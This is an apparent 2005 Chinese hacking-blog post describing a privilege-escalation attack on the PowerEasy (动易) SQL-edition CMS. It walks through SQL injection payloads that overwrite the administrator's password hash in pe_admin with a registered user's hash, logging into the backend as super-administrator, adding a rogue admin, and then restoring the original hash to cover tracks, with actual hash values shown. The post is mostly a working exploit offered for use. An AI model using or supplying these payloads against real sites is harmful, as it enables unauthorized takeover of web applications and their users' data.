2005-11-30 22:19:53 by: h4x0r
Selected Content

动易SQL版新漏洞直接拿后台

Font Size: Large | Medium | Small
先注册个号,进入控制面版给自己发条短信

http://xxx.com/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4
这就是点```

用户名为admin 奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为
=没有登陆````ef0020cf8c5e45b9 密码是这个```

下面就开始将管理员的密码更新为我注册用户的密码````

利用动易爆库改库程序先将pe_admin里adminname,password字段爆出来.....

);update pe_admin set password=(select userpassword from pe_user where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b)%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--
这语句的意思就是将PE——ADMIN表中ID=1的用户的密码更新为PE_USER表中 user的密码```好``现在来看```需要将hack520转char
更新成功`~~~~现在已经将PE_admin表ID=1的用户的密码更新为hack520的密码````再看一下```

53dc3b60f2d40cd4这个是我前面注册的密码```好现在登陆后台看看
您的用户名:admin
您的身份:超级管理员
待阅短信: 1 条
成功````然后为自己加个管理员`然后利用以下语句`将管理员的密码更新回来
user
就是注册的用户名````````时间不多```进得了后台就不管其他的先了````拿WEBSHELL以后再说```

刚刚时间到了,现在继续。。。将管理员密码改回来.

);declare @a sysname select @a=0x6500660030003000320030006300660038006300350065003400350062003900 update pe_admin set password=@a-- 这个要转一下

更新```把管理员密码改回来 OK我们再看看修改成功没```ef0020cf8c5e45b9这个是原来的密码吧?
好了就到此结束!
Comments Feed Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=217

There is no comment on this article.

Post Comment
Smilies
[smile] [confused] [cool] [cry]
[eek] [angry] [wink] [sweat]
[lol] [stun] [razz] [redface]
[rolleyes] [sad] [yes] [no]
[heart] [star] [music] [idea]
Enable UBB Codes
Auto Convert URL
Show Smilies
Hidden Comment
Username:   Password:   Register Now?
Security Code * Please Enter the Security Code